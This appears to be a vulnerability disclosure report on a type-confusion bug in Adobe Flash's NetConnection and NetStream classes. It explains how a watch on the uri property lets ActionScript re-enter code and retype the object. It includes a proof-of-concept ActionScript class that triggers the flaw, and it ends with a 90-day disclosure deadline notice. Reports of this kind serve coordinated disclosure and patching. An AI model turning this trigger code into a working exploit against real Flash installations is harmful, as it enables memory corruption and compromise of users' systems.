The NetStream class does not check that the new object is a normal object before setting its user data and destroy function. This allows for type confusion in several places, including the NetConnection class as shown in the code below:
import flash.display.BitmapData;
import flash.net.FileReference;
class mysubclass extends NetConnection {
function mysubclass(a){
this.uri = "test";
super();
this.watch("uri", func);
var n = {toString : func}
var s = super;
var y;
trace(y);
this.connect(y);
var f = ASnative(2101, 411); //setBufferTimeMax
f.call(this, 1000);
function func(a, b, c){
trace("here " + b + " " + c);
var f = ASnative(2101, 200); // newStream
var o = {};
var n = new NetConnection();
var y;
n.connect(y);
f(this, n);
return c;
}
}
}
The NetConnection connect function checks that the this object is a NetConnection, but then sets the URI before it sets the user data and destroyproc. Setting a watch on the URL allows a call into ActionScript, and then the object type can be set using the NetStream constructor before returning to the NetConnection. This leads to an object with type NetStream backed by a native object of type NetConnection.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
